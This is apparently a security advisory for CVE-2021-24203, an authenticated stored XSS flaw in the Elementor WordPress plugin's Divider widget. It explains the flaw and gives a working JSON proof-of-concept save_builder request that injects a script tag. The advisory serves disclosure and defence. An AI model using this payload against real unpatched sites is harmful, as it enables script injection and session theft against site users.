Elementor < 3.1.4 – Authenticated Stored Cross-Site Scripting (XSS) in Divider Widget | CVE 2021-24203

Description

In the plugin, the divider widget (includes/widgets/divider.php) accepts an ‘html_tag’ parameter. Although the element control lists a fixed set of possible html tags, it is possible for a user with Contributor or above permissions to send a modified ‘save_builder’ request with this parameter set to ‘script’ and combined with a ‘text’ parameter containing JavaScript, which will then be executed when the saved page is viewed or previewed.

Proof of Concept

{"save_builder":{"action":"save_builder","data":{"status":"pending","elements":[{"id":"826b3e5","elType":"section","isInner":"","settings":{"ekit_all_conditions_list":[{"_id":"5971172"}],"ekit_section_parallax_multi_items":[]},"elements":[{"id":"17bf19a","elType":"column","isInner":false,"settings":{"_column_size":100,"_inline_size":null,"ekit_all_conditions_list":[{"_id":"52c5d94"}]},"elements":[{"id":"227f577","elType":"widget","isInner":false,"settings":{"look":"line_text","text":"alert(\"pwnedbydivider\");","html_tag":"script","ekit_all_conditions_list":[{"_id":"6715aca"}],"ekit_adv_tooltip_content":"Tooltip Content."},"elements":[],"widgetType":"divider"}]}]}],"settings":{"post_title":"dividerpoc","post_status":"pending"}}}}